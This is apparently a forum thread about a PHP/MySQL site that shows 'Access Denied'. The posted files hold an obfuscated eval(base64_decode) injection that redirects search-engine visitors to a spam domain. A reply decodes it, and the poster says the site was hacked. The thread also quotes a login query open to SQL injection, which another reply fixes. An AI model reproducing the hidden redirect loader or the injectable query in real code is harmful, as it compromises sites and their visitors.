Help with PHP and MYSQL

[SkylineMaster]

Im trying to add a new person to database and its giving access denied from out of nowhere, it was working before.

this are my two main files:

Error im getting Access denied.

Access.php

<?php	                                       			                                                      eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?> 
<?
if($_SESSION['agent_type'] != "AGENT"){
?>
<link href="../style.css" rel="stylesheet" type="text/css">

	<div align="center">
	  <p class="r16"><strong>Access Denied...</strong></p>
	  <p>
	    <input name="cancel" type="button" id="cancel" value="Index" onClick="javascript:location.href='../';">
</p>
	</div>
<?
die();
}
?>

add_applicant.php

<?php

 session_start();
 set_time_limit(0);
 error_reporting (E_ALL ^ E_NOTICE);
 $_SESSION['agent_lang'] = "EN"; 

	$base_folder = "";
	$lang = "en";
	include("../function_read_countries.php");
	$paises = function_read_countries("en");

?>
<? 
	$permiso = "AGENT";
	include("../access.php");
	include("../functions.php");
?>
<?
include ("../../tconnection.php");
  $Coneccion = new TConeccion();
  $Coneccion_tmp = new TConeccion();
?>
<?php
	function quitar_enters($text){
		$text = nl2br($text);
		$pos = strpos($text, "<br />");
		if($pos > 0){
			$text = substr($text, 0, $pos);
		}
		return $text;
	}
?>

Header only the rest is the html template.

functions.php

<?php	                                       			                                                      eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?> 
<?php	                                       			eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));

function mes_str($mes_int){
	switch ($mes_int) {
	case "01":
		$mes = "January";
		break;
	case "02":
		$mes = "February";
		break;
	case "03":
		$mes = "March";
		break;
	case "04":
		$mes = "April";
		break;
	case "05":
		$mes = "May";
		break;
	case "06":
		$mes = "June";
		break;
	case "07":
		$mes = "Julio";
		break;
	case "08":
		$mes = "August";
		break;
	case "09":
		$mes = "September";
		break;
	case "10":
		$mes = "October";
		break;
	case "11":
		$mes = "November";
		break;
	case "12":
		$mes = "December";
		break;
	}
	return $mes;
}


function redondear($numero) {
	return number_format($numero,2,'.','.');
}

function date_dentrode($dias){
	$result = mktime(0, 0, 0, date("m"), date("d") + $dias, date("Y"));
	$result = date("Ymd", $result);
	return $result;
}
?>

By what i understand its checking database and says its not an agent which is the access i need to add new applicants, any1 can help:?:?

 

[foxx]

Haven't actually read what you want, but a quick tip that came to my mind while looking at the source, firstly name your functions in english and secondly

function mes_str($mes_int){
  $monthsArray = array(
    "01"=>"January",
    "02"=>"February"
    // etc
  );

  return $monthsArray[$mes_int];
}

would be much better, in fact, supposing you want to return those months ALWAYS in english,

function mes_str($mes_int){
  $timestamp = mktime(0, 0, 0, 1, $mes_int, 2011);
  return date("F", $timestamp);
}

would be even better..

 

[SkylineMaster]

page is in many langs, and for the fuctions i did not coded them im now troubleshooting it thats why im having this big mess.thanks.

 

[Justei]

Edit: Nevermind, saw I was wrong, gonna take another look.

 

[SkylineMaster]

where i have a doubt its in the eval(base64_decode that i cannot decode whats behind it.

also part of our webpage is joomla coding.

 

[TimeBomb]

where i have a doubt its in the eval(base64_decode that i cannot decode whats behind it.

also part of our webpage is joomla coding.

Really? I google'd base64 decoder and clicked the first link.

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
	if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inu		
		header("Location: http://buyordie.osa.pl/");
		exit();
	}
}
}

Script injections are annoying...

 

[.ICE.]

Basic

URL url = new URL("http://....");
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestProperty(
    "Authorization", 
    "Basic " + Base64.encode(
        username + ":" + password
    )
);      
InputStream in = connection.getInputStream();

 

[foxx]

Basic

URL url = new URL("http://....");
HttpURLConnection connection = (HttpURLConnection)url.openConnection();
connection.setRequestProperty(
    "Authorization", 
    "Basic " + Base64.encode(
        username + ":" + password
    )
);      
InputStream in = connection.getInputStream();

Doesn't look very php to me

 

[holthelper]

how are you setting $_SESSION['agent_type']?

that may be the key as to why its not working and for the months, pass it through a simple array.

function mes_str($mes_int) {
    $months = array(
		1  => "January",
		2  => "February",
		3  => "March",
		4  => "April",
		5  => "May",
		6  => "June",
		7  => "July",
		8  => "August",
		9  => "September",
		10 => "October",
		11 => "November",
		12 => "December"
	);
	return $months[$mes_int];
}

edit:
foxx already posted it LOL
fyi "01" == 1

 

[SkylineMaster]

Just found out in my other thread that it the base64 code was because the joomla got hacked, already fixed that but still, im getting access denied in that part of the page.

 

[s-p-n]

You got all sorts of issues going on with that site, don't ya?

 

[SkylineMaster]

lol yes, this is bad, im new to the small company im working for and the web administrator is out of the country with no internet access or phone. u r problably guessing where? search for CUBA lol.

spn mind giving me a hand here, im getting tested, could u add me to msn?

---------- Post added at 09:03 AM ---------- Previous post was at 08:55 AM ----------

$idioma=$_GET["lan"];
	$sql = "SELECT EMAIL, NAME, APPROVED_BY, LANGUAGE";
	$sql .= " FROM agents";
	$sql .= " WHERE EMAIL = '".$_POST['email']."' AND PASS LIKE '".$_POST['password']."'";
	$Coneccion->Gestion($sql);
	if($Coneccion->C == 1){
		$Rows = mysql_fetch_array($Coneccion->Query);
		if($Rows['APPROVED_BY'] != "0"){
			$_SESSION['agent_email'] = $Rows['EMAIL'];
			$_SESSION['agent_name'] = $Rows['NAME'];
			$_SESSION['agent_type'] = "AGENT";
			if(!$Rows['LANGUAGE']){
				$_SESSION['agent_lang'] = "EN";
			}else{
				$_SESSION['agent_lang'] = $Rows['LANGUAGE'];
			}
			if(file_exists($_SESSION['agent_lang']."/index.php")){
				$filepath = $_SESSION['agent_lang']."/index.php?c=1";
			}else{
				$filepath = "EN/index.php?c=1";
			}
			echo ("<script>location.href='".$filepath."';</script>");	  
		}else{
			switch($idioma){

this is the logon.php removed some code after switch($idioma) it just bunch of languages.

 

[holthelper]

is it me or does this part seem incomplete:

$Coneccion->Query

 

[s-p-n]

$sql .= " WHERE EMAIL = '".$_POST['email']."' AND PASS LIKE '".$_POST['password']."'";

That just drives me mad.

Try this instead:

<?php
	//$idioma = $_GET["lan"]; // May not be needed, just use $_GET['lan']
	$email = mysql_real_escape_string($_POST['email']); //Protect against MySQL injection
	$password = mysql_real_escape_string($_POST['password']); //Protect against MySQL injection
	
	$sql = "SELECT EMAIL, NAME, APPROVED_BY, LANGUAGE"; 
	$sql .= " FROM agents"; 
	$sql .= " WHERE EMAIL = '" . $email . "' AND PASS = '" . $password . "'"; //Notice I didn't use 'LIKE' I used '=' for PASS.
	
	$Coneccion->Gestion($sql); 
	
	if($Coneccion->C == 1)
	{
		$Rows = mysql_fetch_array($Coneccion->Query); 
		
		if($Rows['APPROVED_BY'] != "0")
		{
			$_SESSION['agent_email'] = $Rows['EMAIL']; 
			$_SESSION['agent_name'] = $Rows['NAME']; 
			$_SESSION['agent_type'] = "AGENT"; 
			$_SESSION['agent_lang'] = (strlen($Rows['LANGUAGE']) ? $Rows['LANGUAGE'] : "EN"); 
			
			$filepath = (file_exists($_SESSION['agent_lang'] . "/index.php") ? ($_SESSION['agent_lang'] . "/index.php?c=1") : "EN/index.php?c=1"; 
			
			echo("<script>location.href='" . $filepath . "';</script>");       
		} else {
			switch( (isset($_GET["lan"]) ? $_GET['lan'] : '') ) 
			{
				//..case..case..case
			}
			
			//..
		}
		
		//..
	}

 

[SkylineMaster]

is it me or does this part seem incomplete:

$Coneccion->Query

script is incomplete because i only posted part of it.